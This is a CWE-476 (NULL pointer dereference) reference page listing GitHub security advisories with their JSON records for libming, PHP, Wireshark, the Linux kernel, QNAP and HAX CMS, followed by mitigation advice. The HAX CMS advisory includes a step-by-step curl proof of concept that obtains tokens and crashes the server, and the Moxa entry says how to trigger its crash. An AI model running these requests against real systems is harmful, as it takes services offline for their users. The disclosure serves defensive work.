CWE-476
AllowedNULL Pointer Dereference
Abstraction: Base · Status: Stable
The product dereferences a pointer that it expects to be valid but is NULL.
6310 vulnerabilities reference this CWE, most recent first.
GHSA-9QFV-2W67-MH77
Vulnerability from github – Published: 2022-05-14 01:29 – Updated: 2022-05-14 01:29An invalid memory address dereference was discovered in getString in util/decompile.c in libming 0.4.8 for CONSTANT16 data. The vulnerability causes a segmentation fault and application crash, which leads to denial of service.
{
"affected": [],
"aliases": [
"CVE-2018-7870"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-03-08T18:29:00Z",
"severity": "MODERATE"
},
"details": "An invalid memory address dereference was discovered in getString in util/decompile.c in libming 0.4.8 for CONSTANT16 data. The vulnerability causes a segmentation fault and application crash, which leads to denial of service.",
"id": "GHSA-9qfv-2w67-mh77",
"modified": "2022-05-14T01:29:17Z",
"published": "2022-05-14T01:29:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7870"
},
{
"type": "WEB",
"url": "https://github.com/libming/libming/issues/117"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892260"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2018/04/msg00008.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QH3-H8F3-PXRF
Vulnerability from github – Published: 2022-05-14 01:45 – Updated: 2022-05-14 01:45ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM("WScript.Shell").
{
"affected": [],
"aliases": [
"CVE-2018-19395"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-11-20T21:29:00Z",
"severity": "HIGH"
},
"details": "ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM(\"WScript.Shell\").",
"id": "GHSA-9qh3-h8f3-pxrf",
"modified": "2022-05-14T01:45:24Z",
"published": "2022-05-14T01:45:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19395"
},
{
"type": "WEB",
"url": "https://bugs.php.net/bug.php?id=77177"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20181221-0005"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105989"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QJ3-XGH5-M3V7
Vulnerability from github – Published: 2022-05-24 19:08 – Updated: 2022-05-24 19:08An issue has been found in function DCTStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a NULL pointer dereference (invalid read of size 1) .
{
"affected": [],
"aliases": [
"CVE-2020-19470"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-21T18:15:00Z",
"severity": "MODERATE"
},
"details": "An issue has been found in function DCTStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a NULL pointer dereference (invalid read of size 1) .",
"id": "GHSA-9qj3-xgh5-m3v7",
"modified": "2022-05-24T19:08:33Z",
"published": "2022-05-24T19:08:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19470"
},
{
"type": "WEB",
"url": "https://github.com/flexpaper/pdf2json/issues/31"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9QMP-F2HC-7J5X
Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2025-04-20 03:36An exploitable null pointer dereference vulnerability exists in the Web Application /forms/web_runScript iw_filename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server.
{
"affected": [],
"aliases": [
"CVE-2016-8726"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-04-13T19:59:00Z",
"severity": "HIGH"
},
"details": "An exploitable null pointer dereference vulnerability exists in the Web Application /forms/web_runScript iw_filename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server.",
"id": "GHSA-9qmp-f2hc-7j5x",
"modified": "2025-04-20T03:36:05Z",
"published": "2022-05-13T01:01:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-8726"
},
{
"type": "WEB",
"url": "http://www.talosintelligence.com/reports/TALOS-2016-0240"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QRW-CMG5-G8VQ
Vulnerability from github – Published: 2026-04-27 18:32 – Updated: 2026-05-06 21:31In the Linux kernel, the following vulnerability has been resolved:
EDAC/mc: Fix error path ordering in edac_mc_alloc()
When the mci->pvt_info allocation in edac_mc_alloc() fails, the error path will call put_device() which will end up calling the device's release function.
However, the init ordering is wrong such that device_initialize() happens after the failed allocation and thus the device itself and the release function pointer are not initialized yet when they're called:
MCE: In-kernel MCE decoding enabled. ------------[ cut here ]------------ kobject: '(null)': is not initialized, yet kobject_put() is being called. WARNING: lib/kobject.c:734 at kobject_put, CPU#22: systemd-udevd CPU: 22 UID: 0 PID: 538 Comm: systemd-udevd Not tainted 7.0.0-rc1+ #2 PREEMPT(full) RIP: 0010:kobject_put Call Trace: edac_mc_alloc+0xbe/0xe0 [edac_core] amd64_edac_init+0x7a4/0xff0 [amd64_edac] ? __pfx_amd64_edac_init+0x10/0x10 [amd64_edac] do_one_initcall ...
Reorder the calling sequence so that the device is initialized and thus the release function pointer is properly set before it can be used.
This was found by Claude while reviewing another EDAC patch.
{
"affected": [],
"aliases": [
"CVE-2026-31689"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-27T18:16:54Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/mc: Fix error path ordering in edac_mc_alloc()\n\nWhen the mci-\u003epvt_info allocation in edac_mc_alloc() fails, the error path\nwill call put_device() which will end up calling the device\u0027s release\nfunction.\n\nHowever, the init ordering is wrong such that device_initialize() happens\n*after* the failed allocation and thus the device itself and the release\nfunction pointer are not initialized yet when they\u0027re called:\n\n MCE: In-kernel MCE decoding enabled.\n ------------[ cut here ]------------\n kobject: \u0027(null)\u0027: is not initialized, yet kobject_put() is being called.\n WARNING: lib/kobject.c:734 at kobject_put, CPU#22: systemd-udevd\n CPU: 22 UID: 0 PID: 538 Comm: systemd-udevd Not tainted 7.0.0-rc1+ #2 PREEMPT(full)\n RIP: 0010:kobject_put\n Call Trace:\n \u003cTASK\u003e\n edac_mc_alloc+0xbe/0xe0 [edac_core]\n amd64_edac_init+0x7a4/0xff0 [amd64_edac]\n ? __pfx_amd64_edac_init+0x10/0x10 [amd64_edac]\n do_one_initcall\n ...\n\nReorder the calling sequence so that the device is initialized and thus the\nrelease function pointer is properly set before it can be used.\n\nThis was found by Claude while reviewing another EDAC patch.",
"id": "GHSA-9qrw-cmg5-g8vq",
"modified": "2026-05-06T21:31:30Z",
"published": "2026-04-27T18:32:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31689"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/51520e03e70d6c73e33ee7cbe0319767d05764fe"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/75825648ce984ca4cebb28e4bd2bf8c3a7e837c5"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/87ce8ae511962e105bcb3534944208c6a9471ed9"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/aae95970fad2127a1bd49d8713c7cd0677dcd2d6"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d20e98c2df9354cc744431ad8ccbf49405b8b40f"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d3de72e2a2b9ee3a57734c1c068823e41a707715"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QX5-GP64-8FHF
Vulnerability from github – Published: 2022-05-14 01:57 – Updated: 2022-05-14 01:57wernsey/bitmap before 2018-08-18 allows a NULL pointer dereference via a 4-bit image.
{
"affected": [],
"aliases": [
"CVE-2018-17073"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-16T02:29:00Z",
"severity": "HIGH"
},
"details": "wernsey/bitmap before 2018-08-18 allows a NULL pointer dereference via a 4-bit image.",
"id": "GHSA-9qx5-gp64-8fhf",
"modified": "2022-05-14T01:57:27Z",
"published": "2022-05-14T01:57:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17073"
},
{
"type": "WEB",
"url": "https://github.com/wernsey/bitmap/issues/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QX9-2278-6VPX
Vulnerability from github – Published: 2022-05-17 03:40 – Updated: 2022-05-17 03:40The USB subsystem in Wireshark 1.12.x before 1.12.12 and 2.x before 2.0.4 mishandles class types, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.
{
"affected": [],
"aliases": [
"CVE-2016-5354"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-08-07T16:59:00Z",
"severity": "MODERATE"
},
"details": "The USB subsystem in Wireshark 1.12.x before 1.12.12 and 2.x before 2.0.4 mishandles class types, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.",
"id": "GHSA-9qx9-2278-6vpx",
"modified": "2022-05-17T03:40:38Z",
"published": "2022-05-17T03:40:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5354"
},
{
"type": "WEB",
"url": "https://github.com/wireshark/wireshark/commit/2cb5985bf47bdc8bea78d28483ed224abdd33dc6"
},
{
"type": "WEB",
"url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12356"
},
{
"type": "WEB",
"url": "https://www.wireshark.org/security/wnpa-sec-2016-33.html"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2016/dsa-3615"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/06/09/3"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/91140"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QXW-372M-V533
Vulnerability from github – Published: 2025-09-05 18:31 – Updated: 2025-11-25 21:32In the Linux kernel, the following vulnerability has been resolved:
media: iris: Fix NULL pointer dereference
A warning reported by smatch indicated a possible null pointer dereference where one of the arguments to API "iris_hfi_gen2_handle_system_error" could sometimes be null.
To fix this, add a check to validate that the argument passed is not null before accessing its members.
{
"affected": [],
"aliases": [
"CVE-2025-39708"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-05T18:15:48Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: iris: Fix NULL pointer dereference\n\nA warning reported by smatch indicated a possible null pointer\ndereference where one of the arguments to API\n\"iris_hfi_gen2_handle_system_error\" could sometimes be null.\n\nTo fix this, add a check to validate that the argument passed is not\nnull before accessing its members.",
"id": "GHSA-9qxw-372m-v533",
"modified": "2025-11-25T21:32:04Z",
"published": "2025-09-05T18:31:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-39708"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/0f837559ccdd275c5a059e6ac4d5034b03409f1d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/992ddee3c0da5f113ba86892ace467c1ac645538"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9R22-FHXQ-HH2C
Vulnerability from github – Published: 2025-08-29 18:30 – Updated: 2025-09-22 18:30A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.
We have already fixed the vulnerability in the following versions: QTS 5.2.5.3145 build 20250526 and later QuTS hero h5.2.5.3138 build 20250519 and later
{
"affected": [],
"aliases": [
"CVE-2025-30267"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-29T18:15:38Z",
"severity": "MODERATE"
},
"details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.5.3145 build 20250526 and later\nQuTS hero h5.2.5.3138 build 20250519 and later",
"id": "GHSA-9r22-fhxq-hh2c",
"modified": "2025-09-22T18:30:31Z",
"published": "2025-08-29T18:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30267"
},
{
"type": "WEB",
"url": "https://www.qnap.com/en/security-advisory/qsa-25-21"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9R33-XHW8-4QQP
Vulnerability from github – Published: 2026-05-19 19:51 – Updated: 2026-06-09 11:57Summary
The HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.
Details
The createSite remote import flow does not complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.
The crash occurs because createSite passes a file object without originalname, while HAXCMSFile.save() immediately dereferences tmpFile.originalname.replace(...).
As a result:
- the request reaches privileged code inside
createSite - the server hits the remote file handling path
- the process crashes before
downloadAndSaveFile()performs the outbound request - no imported file is written into the site directory
Affected Resources
- src/routes/createSite.js:176
- src/lib/HAXCMSFile.js:25
- system/api/createSite
PoC
- Obtain a JWT by logging in with valid credentials.
JWT=$(curl -s -X POST 'http://127.0.0.1:3000/system/api/login' \
-H 'Content-Type: application/json' \
-d '{"username":"admin","password":"admin"}' | grep -o '"jwt":"[^"]*"' | head -1 | cut -d'"' -f4)
- Extract the required tokens from the
connectionSettingsendpoint.
SETTINGS=$(curl -s 'http://127.0.0.1:3000/system/api/connectionSettings')
ROOT_TOKEN=$(printf '%s' "$SETTINGS" | grep -o '"token":"[^"]*"' | head -1 | cut -d'"' -f4)
USER_TOKEN=$(printf '%s' "$SETTINGS" | grep -o 'createSite[^"]*' | grep -o 'user_token=[^"&]*' | cut -d'=' -f2)
- Send the malformed request to crash the server.
curl -i -X POST "http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN&jwt=$JWT" \
-H 'Content-Type: application/json' \
-d "{
\"token\": \"$ROOT_TOKEN\",
\"site\": { \"name\": \"dos-poc\" },
\"theme\": {},
\"build\": {
\"structure\": \"import\",
\"type\": \"import\",
\"items\": [],
\"files\": {
\"files/poc.txt\": \"http://127.0.0.1:8888/poc.txt\"
}
}
}"
The curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading 'replace') and nodemon reports the application as crashed.
Impact
An authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@haxtheweb/haxcms-nodejs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46357"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T19:51:51Z",
"nvd_published_at": "2026-06-05T20:17:33Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nThe HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.\n\n### Details\n\nThe `createSite` remote import flow does **not** complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.\n\nThe crash occurs because `createSite` passes a file object without `originalname`, while `HAXCMSFile.save()` immediately dereferences `tmpFile.originalname.replace(...)`.\n\nAs a result:\n\n- the request reaches privileged code inside `createSite`\n- the server hits the remote file handling path\n- the process crashes before `downloadAndSaveFile()` performs the outbound request\n- no imported file is written into the site directory\n\n### Affected Resources\n\n- src/routes/createSite.js:176\n- src/lib/HAXCMSFile.js:25\n- system/api/createSite\n\n### PoC\n\n1. Obtain a JWT by logging in with valid credentials.\n\n```bash\nJWT=$(curl -s -X POST \u0027http://127.0.0.1:3000/system/api/login\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"admin\",\"password\":\"admin\"}\u0027 | grep -o \u0027\"jwt\":\"[^\"]*\"\u0027 | head -1 | cut -d\u0027\"\u0027 -f4)\n```\n\n2. Extract the required tokens from the `connectionSettings` endpoint.\n\n```bash\nSETTINGS=$(curl -s \u0027http://127.0.0.1:3000/system/api/connectionSettings\u0027)\nROOT_TOKEN=$(printf \u0027%s\u0027 \"$SETTINGS\" | grep -o \u0027\"token\":\"[^\"]*\"\u0027 | head -1 | cut -d\u0027\"\u0027 -f4)\nUSER_TOKEN=$(printf \u0027%s\u0027 \"$SETTINGS\" | grep -o \u0027createSite[^\"]*\u0027 | grep -o \u0027user_token=[^\"\u0026]*\u0027 | cut -d\u0027=\u0027 -f2)\n```\n\n3. Send the malformed request to crash the server.\n\n```bash\ncurl -i -X POST \"http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN\u0026jwt=$JWT\" \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\n \\\"token\\\": \\\"$ROOT_TOKEN\\\",\n \\\"site\\\": { \\\"name\\\": \\\"dos-poc\\\" },\n \\\"theme\\\": {},\n \\\"build\\\": {\n \\\"structure\\\": \\\"import\\\",\n \\\"type\\\": \\\"import\\\",\n \\\"items\\\": [],\n \\\"files\\\": {\n \\\"files/poc.txt\\\": \\\"http://127.0.0.1:8888/poc.txt\\\"\n }\n }\n }\"\n```\n\n\u003cimg width=\"953\" height=\"433\" alt=\"Empty-Reply\" src=\"https://github.com/user-attachments/assets/f3562726-2e64-4af6-a06c-8356dc7708da\" /\u003e\n\n\nThe curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading \u0027replace\u0027) and nodemon reports the application as crashed.\n\n\u003cimg width=\"950\" height=\"278\" alt=\"crash-detail\" src=\"https://github.com/user-attachments/assets/1fbc80fb-4c2d-4bc6-af29-c3e9c45e8ad1\" /\u003e\n\n\n### Impact\n\nAn authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.",
"id": "GHSA-9r33-xhw8-4qqp",
"modified": "2026-06-09T11:57:10Z",
"published": "2026-05-19T19:51:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-9r33-xhw8-4qqp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46357"
},
{
"type": "PACKAGE",
"url": "https://github.com/haxtheweb/issues"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "HAX CMS: Denial of Service using Malicious Import Request"
}
Mitigation MIT-56
For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].
Mitigation
Select a programming language that is not susceptible to these issues.
Mitigation
Check the results of all functions that return a value and verify that the value is non-null before acting upon it.
Mitigation
Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.
Mitigation
Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.
No CAPEC attack patterns related to this CWE.